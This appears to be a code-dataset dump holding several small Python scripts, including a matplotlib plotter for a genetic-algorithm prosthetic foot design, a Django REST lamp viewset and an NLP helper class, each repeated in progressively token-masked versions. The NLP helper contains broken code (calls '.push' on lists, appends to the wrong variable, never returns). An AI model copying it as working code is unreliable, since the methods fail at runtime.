[ "# 1\r\ndef transform_data(fn):\r\n print(fn(10))\r\n\r\n# 2\r\ntransform_data(lambda data: data / 5)\r\n\r\n# 3\r\ndef transform_data2(fn, *args):\r\n for arg in args:\r\n print(fn(arg))\r\n\r\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\r\n\r\n# 4\r\ndef transform_data2(fn, *args):\r\n for arg in args:\r\n print('Result: {:^20.2f}'.format(fn(arg)))\r\n\r\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)", "def transform_data(fn):\n print(fn(10))\n\n\ntransform_data(lambda data: data / 5)\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print('Result: {:^20.2f}'.format(fn(arg)))\n\n\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print('Result: {:^20.2f}'.format(fn(arg)))\n\n\n<code token>\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\n<code token>\n<function token>\n<code token>\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n<function token>\n<code token>\n<function token>\n<code token>\n", "<function token>\n<code token>\n<function token>\n<code token>\n<function token>\n<code token>\n" ]
false
53
f4f08015b7638f4d6ea793350d5d19a3485978cd
"""Plot the output data. """ # Standard library import os import json import math import matplotlib as maplot import matplotlib.pyplot as pyplot from datetime import datetime # User library from sub.inputprocess import CONSTANTS as CONS # **json.loads(json_data) def get_data(): """Read output file to get data.""" try: with open(CONS["OUTPUT_FILE"], "r") as file: data = json.load(file)[1] return data except FileNotFoundError: print("Data file not found.") exit() def get_objectives(data): """Get a list of all first chromosomes' objective values.""" objectives = [math.log(population[0]["objective"]) for population in data] # objectives = [population[0]["objective"] for population in data] return objectives def get_new_values(values): """Record any changes higher. Its size is the same as its argument's.""" new_values = [] new_value = values[0] for value in values: if value > new_value: new_value = value new_values.append(new_value) return new_values def main(values, is_animation=False): """Main function to show the plot which could be played with animation.""" def on_clicked(event): """Direct the program when a key is pressed.""" if event.key == "x": # Use this os._exit(0) to close whole window, even when playing os._exit(0) if event.key == "s": # Get time to define image's name now = datetime.now() current_time = now.strftime("%H-%M-%S") plot_name = "Plot" + "-" + current_time # Remove left title, then save image pyplot.title("", loc="left", pad=20) fig.savefig( "%s%s%s" % ( CONS["OUTPUT_PHOTO_DIRECTORY"], plot_name, CONS["PHOTO_TYPE"], ), transparent=False, dpi=300, ) # Use this exit(0) to prevent exiting when playing the plot # but allow closing when plotting finishes exit(0) def draw(values): """Plot the grid, the line graphs and the titles.""" # Turn on grid with dashed style subplot.yaxis.grid(True, linestyle="dashed") # Get list of new higher values new_values = get_new_values(values) # Plot 2 lines subplot.plot(range(len(values)), values) subplot.plot(range(len(new_values)), new_values, linewidth=2) # Print left plot title pyplot.title( "Press X to exit\nPress S to save", loc="left", fontsize=14, color="#1F76B4", style="italic", pad=20, ) # Print right plot title pyplot.title( f"{'Max objective:':>25}{max(values):>10.2E}\n" f"{'Generation:':>25}{values.index(max(values)):>10}", loc="right", fontfamily="Lucida Sans Typewriter", fontsize=12, color="#FF7E0E", pad=20, ) # The following code configures some elements of the plot window # Disable toolbar maplot.rcParams["toolbar"] = "None" # Set font maplot.rcParams["font.family"] = "Candara" maplot.rcParams["font.size"] = 12 maplot.rcParams["font.weight"] = 500 # Set window title fig = pyplot.figure(figsize=(10, 5)) fig.canvas.set_window_title("Prosthetic Foot Design by Genetic Algorithm") # Set icon manager = pyplot.get_current_fig_manager() manager.window.wm_iconbitmap(CONS["ICON_FILE"]) # Disable some borders subplot = fig.add_subplot(111, frameon=True) subplot.spines["right"].set_visible(False) subplot.spines["left"].set_visible(False) subplot.spines["top"].set_visible(False) # Push verticle axis to the right subplot.yaxis.tick_right() # Padding axis label from plot area, maybe unnecessary subplot.tick_params(axis="y", which="major", pad=5) subplot.tick_params(axis="x", which="major", pad=5) # Adjust subplot size based on window size pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1) # Reconize key pressed pyplot.connect("key_press_event", on_clicked) if is_animation: for index in range(1, len(values) + 1): subplot.clear() draw(values[:index]) pyplot.pause(0.0001) else: draw(values) # Hold window pyplot.show() if __name__ == "__main__": __package__ = "inputprocess" objectives = get_objectives(get_data()) main(objectives, is_animation=CONS["IS_ANIMATION"])
[ "\"\"\"Plot the output data.\n\"\"\"\n\n# Standard library\nimport os\nimport json\nimport math\nimport matplotlib as maplot\nimport matplotlib.pyplot as pyplot\nfrom datetime import datetime\n\n# User library\nfrom sub.inputprocess import CONSTANTS as CONS\n\n\n# **json.loads(json_data)\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS[\"OUTPUT_FILE\"], \"r\") as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print(\"Data file not found.\")\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0][\"objective\"]) for population in data]\n # objectives = [population[0][\"objective\"] for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n\n if event.key == \"x\":\n # Use this os._exit(0) to close whole window, even when playing\n os._exit(0)\n\n if event.key == \"s\":\n # Get time to define image's name\n now = datetime.now()\n current_time = now.strftime(\"%H-%M-%S\")\n plot_name = \"Plot\" + \"-\" + current_time\n\n # Remove left title, then save image\n pyplot.title(\"\", loc=\"left\", pad=20)\n fig.savefig(\n \"%s%s%s\"\n % (\n CONS[\"OUTPUT_PHOTO_DIRECTORY\"],\n plot_name,\n CONS[\"PHOTO_TYPE\"],\n ),\n transparent=False,\n dpi=300,\n )\n\n # Use this exit(0) to prevent exiting when playing the plot\n # but allow closing when plotting finishes\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n\n # Turn on grid with dashed style\n subplot.yaxis.grid(True, linestyle=\"dashed\")\n\n # Get list of new higher values\n new_values = get_new_values(values)\n\n # Plot 2 lines\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n\n # Print left plot title\n pyplot.title(\n \"Press X to exit\\nPress S to save\",\n loc=\"left\",\n fontsize=14,\n color=\"#1F76B4\",\n style=\"italic\",\n pad=20,\n )\n\n # Print right plot title\n pyplot.title(\n f\"{'Max objective:':>25}{max(values):>10.2E}\\n\"\n f\"{'Generation:':>25}{values.index(max(values)):>10}\",\n loc=\"right\",\n fontfamily=\"Lucida Sans Typewriter\",\n fontsize=12,\n color=\"#FF7E0E\",\n pad=20,\n )\n\n # The following code configures some elements of the plot window\n\n # Disable toolbar\n maplot.rcParams[\"toolbar\"] = \"None\"\n\n # Set font\n maplot.rcParams[\"font.family\"] = \"Candara\"\n maplot.rcParams[\"font.size\"] = 12\n maplot.rcParams[\"font.weight\"] = 500\n\n # Set window title\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title(\"Prosthetic Foot Design by Genetic Algorithm\")\n\n # Set icon\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS[\"ICON_FILE\"])\n\n # Disable some borders\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines[\"right\"].set_visible(False)\n subplot.spines[\"left\"].set_visible(False)\n subplot.spines[\"top\"].set_visible(False)\n\n # Push verticle axis to the right\n subplot.yaxis.tick_right()\n\n # Padding axis label from plot area, maybe unnecessary\n subplot.tick_params(axis=\"y\", which=\"major\", pad=5)\n subplot.tick_params(axis=\"x\", which=\"major\", pad=5)\n\n # Adjust subplot size based on window size\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n\n # Reconize key pressed\n pyplot.connect(\"key_press_event\", on_clicked)\n\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n\n # Hold window\n pyplot.show()\n\n\nif __name__ == \"__main__\":\n __package__ = \"inputprocess\"\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS[\"IS_ANIMATION\"])\n", "<docstring token>\nimport os\nimport json\nimport math\nimport matplotlib as maplot\nimport matplotlib.pyplot as pyplot\nfrom datetime import datetime\nfrom sub.inputprocess import CONSTANTS as CONS\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\nif __name__ == '__main__':\n __package__ = 'inputprocess'\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS['IS_ANIMATION'])\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\nif __name__ == '__main__':\n __package__ = 'inputprocess'\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS['IS_ANIMATION'])\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\n<function token>\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\n<function token>\n<function token>\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
54
d2a153fffccd4b681eebce823e641e195197cde7
""" Created on 02.09.2013 @author: Paul Schweizer @email: [email protected] @brief: Holds all the namingconventions for pandora's box """ import os import json class NamingConvention(): """Imports naming conventions from the respective .json file and puts them into class variables. """ def __init__(self): namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'data', 'strings', 'namingconvention.json') namingconventions = json.load(open(namingconventions)) for key, value in namingconventions.items(): setattr(NamingConvention, key, value) # end for constant in constants # end def __init__ # end class NamingConvention
[ "\"\"\"\nCreated on 02.09.2013\n@author: Paul Schweizer\n@email: [email protected]\n@brief: Holds all the namingconventions for pandora's box\n\"\"\"\n\nimport os\nimport json\n\n\nclass NamingConvention():\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)),\n 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n # end for constant in constants\n # end def __init__\n# end class NamingConvention\n", "<docstring token>\nimport os\nimport json\n\n\nclass NamingConvention:\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n \"\"\"Imports naming conventions from the respective .json file and puts them\n into class variables.\n \"\"\"\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n <docstring token>\n\n def __init__(self):\n namingconventions = os.path.join(os.path.dirname(os.path.dirname(\n __file__)), 'data', 'strings', 'namingconvention.json')\n namingconventions = json.load(open(namingconventions))\n for key, value in namingconventions.items():\n setattr(NamingConvention, key, value)\n", "<docstring token>\n<import token>\n\n\nclass NamingConvention:\n <docstring token>\n <function token>\n", "<docstring token>\n<import token>\n<class token>\n" ]
false
55
aff1d702e591efcfc0fc93150a3fbec532408137
from rest_framework import serializers, viewsets, routers from lamp_control.models import Lamp class LampSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = Lamp fields = '__all__' class LampViewSet(viewsets.ModelViewSet): serializer_class = LampSerializer queryset = Lamp.objects.all() router = routers.DefaultRouter() router.register(r'lamps', LampViewSet)
[ "from rest_framework import serializers, viewsets, routers\n\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'lamps', LampViewSet)\n", "from rest_framework import serializers, viewsets, routers\nfrom lamp_control.models import Lamp\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\nrouter = routers.DefaultRouter()\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\nrouter.register('lamps', LampViewSet)\n", "<import token>\n\n\nclass LampSerializer(serializers.HyperlinkedModelSerializer):\n\n\n class Meta:\n model = Lamp\n fields = '__all__'\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n serializer_class = LampSerializer\n queryset = Lamp.objects.all()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n\n\nclass LampViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<class token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
56
c6502ea2b32ad90c76b6dfaf3ee3218d029eba15
class NlpUtility(): """ Utility methods to get particular parts of speech from a token set """ def get_nouns(self, tokens): nouns = [] for word, pos in tokens: if pos == "NN": nouns.push(word) def get_verbs(self, tokens): verbs = [] for word, pos in tokens: if pos == "VB": nouns.push(word) def get_adjectives(self, tokens): nouns = [] for word, pos in tokens: if pos == "NN": nouns.push(word) def get_nouns(self, tokens): nouns = [] for word, pos in tokens: if pos == "NN": nouns.push(word) def get_nouns(self, tokens): nouns = [] for word, pos in tokens: if pos == "NN": nouns.push(word)
[ "class NlpUtility():\n\t\"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_verbs(self, tokens):\n\t\tverbs = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"VB\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_adjectives(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n\n\tdef get_nouns(self, tokens):\n\t\tnouns = []\n\t\tfor word, pos in tokens:\n\t\t\tif pos == \"NN\":\n\t\t\t\tnouns.push(word)\n", "class NlpUtility:\n \"\"\"\n\t\tUtility methods to get particular parts of speech from a token set\n\t\"\"\"\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_verbs(self, tokens):\n verbs = []\n for word, pos in tokens:\n if pos == 'VB':\n nouns.push(word)\n\n def get_adjectives(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = []\n for word, pos in tokens:\n if pos == 'NN':\n nouns.push(word)\n\n def get_nouns(self, tokens):\n nouns = 